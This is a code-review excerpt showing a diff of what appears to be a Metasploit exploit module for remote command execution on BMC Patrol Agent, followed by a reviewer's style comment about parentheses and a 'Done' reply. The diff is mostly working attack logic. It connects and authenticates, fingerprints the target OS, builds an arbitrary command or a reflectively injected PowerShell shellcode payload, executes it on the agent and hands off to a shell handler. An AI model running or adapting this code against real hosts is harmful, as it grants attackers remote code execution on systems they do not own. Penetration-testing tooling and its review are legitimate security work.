modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1170 @@
+      }
+      # Set up the payload handlers
+      payload_instance.setup_handler
+
+      # Start the payload handler
+      payload_instance.start_handler
+    end
+
+    #Initialize zlib objects
+    @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
+    @inflater = Zlib::Inflate.new()
+
+    #Connect to the BMC Patrol Agent
+    connect
+    print_status("Connected to BMC Patrol Agent.")
+
+    #Create session msg
+    create_session
+    ret_data = receive_msg
+    if ret_data == $nil
+      print_error("Failed to receive session confirmation. Aborting.")
+      return
+    end
+    ret_len = ret_data.length
+
+    #Authenticate
+    authenticate_user(datastore['USER'], datastore['PASSWORD'])
+
+    #receive the authentication response
+    ret_data = receive_msg()
+    if ret_data == $nil
+      print_error("Failed to receive authentication response. Aborting.")
+      return
+    end
+
+    ret_msg = process_response( ret_data )
+    if ret_msg =~ /logged in/
+      print_status("Successfully authenticated user.")
+    else
+      print_error("Login failed. Aborting.")
+      return
+    end
+
+
+    #receive the server info
+    ret_data = receive_msg()
+    if ret_data == $nil
+      print_error("Failed to receive server info msg. Aborting.")
+      return
+    end
+    srv_info = process_response( ret_data )
+
+    #Get the target's OS from their info msg
+    target_os = get_target_os(srv_info)
+    if target_os == $nil
+      print_error("Invalid server info msg. Aborting.")
+      return
+    end
+
+    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
+    # Fail if this is the case and ask the user to select an appropriate payload.
+    if target_os[0] == 'Linux' and payload_instance.name =~ /Windows/ and datastore['CMD'] == $nil
+      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
+    end
+
+    target_name = target.name
+    if datastore['CMD'] != $nil
+      command = datastore['CMD'].tr('"', '\"')
+      print_status("Command to execute: #{command}")
+    elsif target_name == 'Windows Powershell Injected Shellcode'
+      #Get encoded powershell of payload
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
+    else
+      command = payload.raw.tr('"', '\"')
+    end
+
+    #Run command
+    run_cmd(command)
+
+    #receive command confirmation
+    ret_data = receive_msg()
+    if ret_data != $nil
+      process_response( ret_data )
+    end
+
+    #receive command output
+    ret_data = receive_msg()
+    if ret_data != $nil and datastore['CMD'] != $nil
+      cmd_result_data = process_response( ret_data )
+      cmd_result = get_cmd_output(cmd_result_data)
+      if cmd_result != $nil
+        print_status( "Output:\n#{cmd_result}" )
+      end
+    end
+
+    #Handle the shell
+    handler
+
+  end
+
+  def receive_msg()
```

Comment:
The parentheses are not required for functions without parameters.

Reply:
Done